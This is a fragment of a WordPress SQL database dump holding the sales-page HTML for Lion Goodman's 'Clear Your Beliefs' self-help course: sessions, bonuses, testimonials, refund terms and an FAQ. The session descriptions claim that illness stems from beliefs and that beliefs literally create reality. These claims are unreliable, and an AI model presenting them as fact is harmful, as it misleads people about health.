you will:</strong>\n\nIdentify old beliefs that stand between you and creating the life you want\nDissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.\nImagine what it means to live without self-imposed limitations, trusting that you can create anything you want\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 4:   <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.\n\nIf you’re married, are you happy and secure?   Or are you anxious about the future?   If you’re not in a relationship, what’s holding you back from finding your ideal mate?\n\nHumans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned “what love is” from your parents – so it’s no wonder that you’re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\n\n&nbsp;\n\n<strong> In Session 4, you will:</strong>\n\nLook deeply into the childhood patterns that enabled you to survive and thrive\nSee which of your beliefs now interfere with your intimate relationships\nDiscover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 5:   <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\n\nWhat do you believe about earning a living in today’s economy?   Is money really the root of all evil?\n\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?\n\n<strong> In Session 5, you will:</strong>\n\nExamine your family and cultural beliefs about money, work, poverty and “deservingness.”\nRemove beliefs that create stumbling blocks in the way of natural abundance\nCreate new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve\nLearn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 6:   <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.\n\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?\n\n<strong> In Session 6, you will:</strong>\n\nIdentify old beliefs that stand between you and vibrant health\nRecognize beliefs that make you vulnerable to disease and injury\nDissolve old beliefs at the root of illness, bad habits and lifestyle stress\nImagine the healthy, vibrant body you want, and create it consciously with new beliefs\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 7:   <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\n\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\n\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\n\n<strong> In Session 7, you will:</strong>\n\nScan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live\nLearn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life\nFind your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are\n\n&nbsp;\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\n\n&nbsp;\n\nBonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can’t seem to stop hurting each other. What’s going on?\n\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)\n\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We’re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\n\nLearn how to determine your own (and your partner’s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #2 <strong>- The LoveStyle Profile Quiz </strong>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong>\n\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world’s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.\n\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You’ll receive the first two chapters of the book as Bonus #4, below.\n\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong>\n\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\n\nBe called to awaken your already-powerful ability to create the life of your dreams\nLearn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)\nUnderstand the 7 chakras as stepping stones along the path of the manifestation process\nGain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life\nLearn a process that can strengthen your power of intention\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #5:<strong> Change Your Beliefs eBook</strong>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a>\n\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>”\n\nLion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior.\n\nIt’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #6: <strong>Complete Transcripts of the Course</strong>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\n\n&nbsp;\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.\n\n<em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.\n\nYour coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.\n\n<strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they’ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\n<a name="package"></a>\n<p style="text-align: right"><a href="http://clearyourbeliefs.com/program/#top">Up To Top</a></p>\n&nbsp;\n\n<h1>Purchase Today and You’ll Receive:</h1>\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world’s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\n<h3 style="font-size: 20px">Plus: <em>The Entire BONUS Collection:</em></h3>\n\n<strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.\n<em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.\nYour Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong>\n<strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)\nMultimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)\n<strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.\n<strong>Optional:</strong> Professional Coaching Sessions.\n\n&nbsp;\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Select Your Plan</a>\n<p style="text-align: center">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank">Free eBook</a>\n\n&nbsp;\n\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>About Lion Goodman</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\n\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>\n\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\n\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\n\n&nbsp;\n\n&nbsp;\n\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\n<strong>– G. J., software developer</strong>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\n<strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\n<strong>~ Jamee Tenzer, Life Coaching for Working Women</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\n<strong>~ S.K., Life Coach, Ontario, Canada </strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\n<strong>~ D. T., Physical Therapist, Denver, CO </strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\n<strong> ~ T. S., Business Owner, Yukon, Canada</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\n<strong>~ T. L., Healer, Stamford, CT </strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\n<strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\n<strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>"I uncovered beliefs I didn''t know I had, including: “I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.” It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\n<strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\n<strong>~ C.T., Performance and Life Coach</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\n<strong>– M.M., International Business Consultant</strong>\n\n&nbsp;\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Select Your Plan</a>\n<p style="text-align: center">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank">Free eBook</a>\n\n&nbsp;\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>Frequently Asked Questions</h1>\n\n<p><strong>Q: What is a virtual course?</strong></p>\n\n<p>A: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.</p>\n\n<p>In addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.</p>\n\n<strong>Q: How long will I have access to the course?</strong>\n\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\n\n<strong>Q: Are there scholarships available?</strong>\n\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\n\n<strong>Q: What is your refund policy?</strong>\n\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\n\n<strong>Q: How can I reach Customer Support?</strong>\n\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\n\n<strong>Q: What is your Privacy Policy?</strong>\n\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\n\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\n\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.\n\n//', 'Clear Your Beliefs Program', '', 'inherit', 'closed', 'open', '', '1941-revision-v1', '', '', '2014-12-14 13:45:08', '2014-12-14 18:45:08', '', 1941, 'http://clearyourbeliefs.com/1941-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(2039, 2, '2014-12-14 13:47:35', '2014-12-14 18:47:35', '<img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg">\n&nbsp;\n<img class="bor-img-top no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong>\n<img class="bor-img-bot no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n&nbsp;&nbsp;			<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<p>You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.</p>\n\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p>\n<img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" />\n<h1>\nWhat If You Could Permanently Delete Old Habits And Patterns – So They Didn’t Come Back?</h1>\n<p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.</p>\n<p><strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You’re still not taking consistent actions to reach your goals or change your life.</p>\n&nbsp;<h3 class="widget-title">Ok I&#8217;m convinced</h3>			<a class="button first" href="http://clearyourbeliefs.com/program/#package">OK, I''M CONVINCED!Take me to the program description,tell me about all the cool bonuses I’ll get,and how much it costs...</a>\n&nbsp;&nbsp;			<h1>\nWhy Does This Happen?</h1>\n<img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /><p class="parg-text">Have you heard the myth, “It takes 30 days to change a habit?” It’s not true. Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p><p class="parg-text">Neuroscientists call the brain’s ability to change over time “neuroplasticity.”</p><p class="parg-text">It can take months – or years – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p>\n&nbsp;			<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\n<p>The best doctors seek the source the source of the dis-ease. They don’t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don’t solve the cause of the problem – where the illness is being generated.</p>\n<p>If you don’t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?</p>\n<img src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" />&nbsp;			<h1>Beliefs Are The Foundation Of Your Experience</h1>\n<p>Your psychological, emotional, and spiritual dis-ease are caused primarily by your beliefs. We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate through us, and they are at the root of all the habits and patterns in our life. But we’re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong></p>\n\n<img width="158" height="118" alt="construction-300x224" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" class=" wp-image-320 alignleft">\n<p class="parg-text text-blue">Beliefs can be seen as the literal foundation of consciousness, upon which our thoughts, feelings, and attitudes are built.</p>\n<p class="parg-text"><strong>We literally create our reality with our beliefs.</strong></p>\n<img width="157" height="114" alt="dilap" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" class=" wp-image-321 alignright">\n<p class="parg-text">If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won’t be able to achieve permanent success.</p>\n\n<h1>Upgrade Your Human Operating System</h1>\n<p>Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – like managing your life.</p>\n<p>Negative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. Do you ever have thoughts like these?</p>\n\n<strong><em>I’m not enough.</em></strong>\n<strong><em>I can’t do it.</em></strong>\n<strong><em>I’m not worthy.</em></strong>\n<strong><strong><em>I’ll never be like them.</em></strong></strong>\n<strong><em>I’m all alone.</em></strong>\n\n<strong><em>I need to do more (or better) to be accepted.</em></strong>\n<strong><em>There’s something wrong with me.</em></strong>\n<strong><em>I’m fundamentally flawed.</em></strong>\n<strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong>\n<strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong>\n\n<p>These beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.</p>\n<p>At the core of every bad feeling you have about yourself, and every limitation you have, there’s a belief operating in the 